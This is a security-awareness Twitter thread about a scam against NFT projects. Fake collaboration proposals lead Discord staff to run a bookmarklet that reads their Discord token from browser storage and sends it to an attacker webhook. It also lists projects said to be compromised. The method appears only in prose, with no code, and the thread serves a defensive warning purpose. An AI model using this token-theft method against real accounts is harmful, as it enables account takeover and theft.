⚠️ Analysis of how $150,000 was stolen today & exploring how NFT multiple projects were hacked today.
Retweet to spread awareness 🚨
Retweet to spread awareness 🚨
1/ I'm sure many projects are aware of the most common method being used right now where staff are social engineered into accidentally sharing their Discord token. If you aren't aware of this method, please read this thread
2/ Now let's explore this new method. It starts with a collaboration proposal, in this case the hackers were pretending to be @WonderPals. The hackers create a replica discord and bot members to make it seem big. To get whitelisted you're asked to visit their website
3/ and enter your whitelist key. Normal stuff right? Then you're asked to drag this button to your bookmarks to be able to enter the code. What you're really bookmarking here is javascript code execution which is downloaded externally
4/ They will also ask you to open discord on your chrome browser. Once you click on the bookmark to enter the code, it will run this code which reads your discord localstorage (where your discord token is located) and sends your token to their webhook.
5/ Discord tokens let you log into any account without needing a password and fully bypasses 2FA. The only way to change your discord token is to change your password. This was used today in the @CosmosKidzNFT compromise today. I'm glad they reached out to me
6/ so I was able to do a deep dive into this and find out what really happened. I will also be auditing their staff and building security measures for them. For any projects reading this, I'm always open to help, feel free to DM me if you have any inquiries.
UPDATE:
- Crypto Chicks
- Divine Anarchy
- Women of Crypto
- NANOPASS
- Fortune Friends Club
- The Littles
- Moshi Mochi
All hacked in the past few days with the exact method in this thread. Over 1000 ETH stolen. Spread this around to all projects because it's not going to stop.
- Crypto Chicks
- Divine Anarchy
- Women of Crypto
- NANOPASS
- Fortune Friends Club
- The Littles
- Moshi Mochi
All hacked in the past few days with the exact method in this thread. Over 1000 ETH stolen. Spread this around to all projects because it's not going to stop.
Loading suggestions...